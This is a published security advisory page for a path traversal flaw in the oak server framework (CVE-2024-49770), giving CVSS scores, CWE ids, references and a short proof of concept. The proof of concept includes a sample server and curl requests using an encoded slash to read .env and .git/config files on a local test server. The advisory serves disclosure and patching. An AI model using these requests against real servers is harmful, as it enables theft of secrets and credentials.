GHSA-qm92-93fv-vh7m
Suggest an improvement- Source
- https://github.com/advisories/GHSA-qm92-93fv-vh7m
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/11/GHSA-qm92-93fv-vh7m/GHSA-qm92-93fv-vh7m.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-qm92-93fv-vh7m
- Aliases
- Published
- 2024-11-01T21:37:10Z
- Modified
- 2024-11-01T22:27:22.350305Z
- Severity
-
- 7.5 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N CVSS Calculator
- 7.7 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P CVSS Calculator
- Summary
- Path traversal in oak allows transfer of hidden files within the served root directory
- Details
-
Summary
By default
oakdoes not allow transferring of hidden files withContext.sendAPI. However, this can be bypassed by encoding/as its URL encoded form%2F.Details
1.) Oak uses decodeComponent which seems to be unexpected. This is also the reason why it is not possible to access a file that contains URL encoded characters unless the client URL encodes it first.
2.) The function isHidden is flawed since it only checks if the first subpath is hidden, allowing secrets to be read from
subdir/.env.PoC
// server.ts import { Application } from "jsr:@oak/oak@17.1.2"; const app = new Application(); app.use(async (context, next) => { try { await context.send({ root: './root', hidden: false, // default }); } catch { await next(); } }); await app.listen({ port: 8000 });In terminal:
# setup root directory mkdir root/.git echo SECRET_KEY=oops > root/.env echo oops > root/.git/config # start server deno run -A server.ts # in another terminal curl -D- http://127.0.0.1:8000/poc%2f../.env curl -D- http://127.0.0.1:8000/poc%2f../.git/configImpact
For an attacker this has potential to read sensitive user data or to gain access to server secrets.
- Database specific
{ "nvd_published_at": "2024-11-01T17:15:17Z", "cwe_ids": [ "CWE-22", "CWE-35" ], "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2024-11-01T21:37:10Z" }- References
-
- https://github.com/oakserver/oak/security/advisories/GHSA-qm92-93fv-vh7m
- https://nvd.nist.gov/vuln/detail/CVE-2024-49770
- https://github.com/oakserver/oak/commit/4b2f27efd5cba5a45b2c3982e610da3af0869209
- https://github.com/oakserver/oak
- https://github.com/oakserver/oak/blob/3896fe568b25ac0b4c5afbf822ff8344c3d1712a/send.ts#L117-L125
- https://github.com/oakserver/oak/blob/3896fe568b25ac0b4c5afbf822ff8344c3d1712a/send.ts#L182C10-L182C25
Affected packages
npm / @oakserver/oak
Package
- Name
- @oakserver/oak
- View open source insights on deps.dev
- Purl
- pkg:npm/%40oakserver/oak